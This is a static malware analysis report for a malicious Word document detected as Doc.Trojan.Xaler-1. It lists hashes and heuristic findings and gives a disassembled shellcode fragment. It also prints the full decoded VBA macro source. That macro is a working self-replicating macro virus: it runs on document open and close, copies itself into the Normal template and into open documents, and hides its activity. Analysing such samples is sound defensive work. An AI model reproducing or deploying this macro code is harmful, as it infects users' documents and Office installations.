Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 829414696f6307ee…

MALICIOUS

Office (OLE)

Size: 7.85 MB
Created: 2019-03-20 07:08:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: 8dde049e5b8181d8660c16fe492fd712
SHA-1: a46db26e7a1f033abc02fd12ce35adc6f9354985
SHA-256: 829414696f6307ee64f918cb6c09be06ae09d21c23210d3510d609aa78bf2773
Risk Score: 250

Heuristics (6)

  • ClamAV: Doc.Trojan.Xaler-1 | severity: critical | rule: CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Xaler-1
  • VBA macros detected | severity: medium | rule: OLE_VBA_MACROS | 2 related findings
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering | severity: critical | rule: OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
  • Document_Open macro | severity: low | rule: OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • x86 GetPC stub (CALL $+5; POP EAX) | severity: high | rule: SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EAX)
    Disassembly
    x86 disassembly · validity: uncertain (0.626) — 3/4 branch targets land on an instruction boundary (75% coherence)
    00020940  e800000000        call 0x20945
    00020945  58                pop eax
    00020946  00ec              add ah, ch
    00020948  94                xchg esp, eax
    00020949  96                xchg esi, eax
    0002094A  0594800000        add eax, 0x8094
    0002094F  0080000038f5      add byte ptr [eax - 0xac80000], al
    00020955  e5d8              in eax, 0xd8
    00020957  8a20              mov ah, byte ptr [eax]
    00020959  0000              add byte ptr [eax], al
    0002095B  04a2              add al, 0xa2
    0002095D  03967bf23209      add edx, dword ptr [esi + 0x932f27b]
    00020963  350e7e7f47        xor eax, 0x477f7e0e
    00020968  131e              adc ebx, dword ptr [esi]
    0002096A  8f                .byte 0x8f
    0002096B  353d3d3955        xor eax, 0x55393d3d
    00020970  f5                cmc
    00020971  72d6              jb 0x20949
    00020973  93                xchg ebx, eax
    00020974  8cd4              mov esp, ss
    00020976  55                push ebp
    00020977  84d2              test dl, dl
    00020979  52                push edx
    0002097A  81650028000000    and dword ptr [ebp], 0x28
    00020981  1495              adc al, 0x95
    00020983  05940004a2        add eax, 0xa2040094
    00020988  50                push eax
    00020989  4b                dec ebx
    0002098A  0a08              or cl, byte ptr [eax]
    0002098C  a228802c00        mov byte ptr [0x2c8028], al
    00020991  0000              add byte ptr [eax], al
    00020993  0001              add byte ptr [ecx], al
    00020995  2c0a              sub al, 0xa
    00020997  58                pop eax
    00020998  0020              add byte ptr [eax], ah
    0002099A  00809a752eef      add byte ptr [eax - 0x10d18a66], al
  • Embedded URL | severity: info | rule: EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (each labelled with the channel that reached it):
    • http://ns.adobe.com/xap/1.0/ | In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# | In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ | In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ | In document text (OLE body)
    • http://www.iec.ch | In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main | In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2436 bytes
SHA-256: 8dfe3ac4c94ec3baad1b0f27171afcde1b53bd199e24689cc99b72cb413f5d2d
Detection: ClamAV: Doc.Trojan.Xaler-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'RELAX
Private Sub RELAX2()
End
End Sub

Private Sub ComboBox1_Change()

End Sub

Private Sub Document_Close()
Call GOODSub
Call RELAX2
End Sub

Private Sub GOODSub()
On Error Resume Next
Application.ScreenUpdating = False
Application.Options.SaveNormalPrompt = False
x$ = "C:\temp.tmp"
MacroContainer.VBProject.vbcomponents.Item("ThisDocument").Export x$
Open x$ For Input As #1
keimeno = Input(LOF(1), 1)
Close #1
kk& = InStr(1, keimeno, "'RELAX")
keimeno = Right$(keimeno, Len(keimeno) - kk& + 1)
For j = 1 To 2
If j = 1 Then
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").Export x$
Else
ActiveDocument.VBProject.vbcomponents.Item("ThisDocument").Export x$
End If
Open x$ For Input As #1
rlx = Input(LOF(1), 1)
Close #1
d1 = InStr(1, rlx, "'RELAX")
If d1 = 0 Then
If j = 1 Then
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
NormalTemplate.Save
Else
ActiveDocument.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
End If
End If
Next j
'====================
Dim PRostasia As Byte
PRostasia = 1
fff = FreeFile
If Dir(ActiveDocument.FullName, 6) <> "" Then
Open ActiveDocument.FullName For Binary As #fff
Put #fff, 862, PRostasia
Close #fff
ActiveDocument.Save
End If
Kill x$
Application.ScreenUpdating = True
End Sub

Private Sub Document_Open()
Call GOODSub
End Sub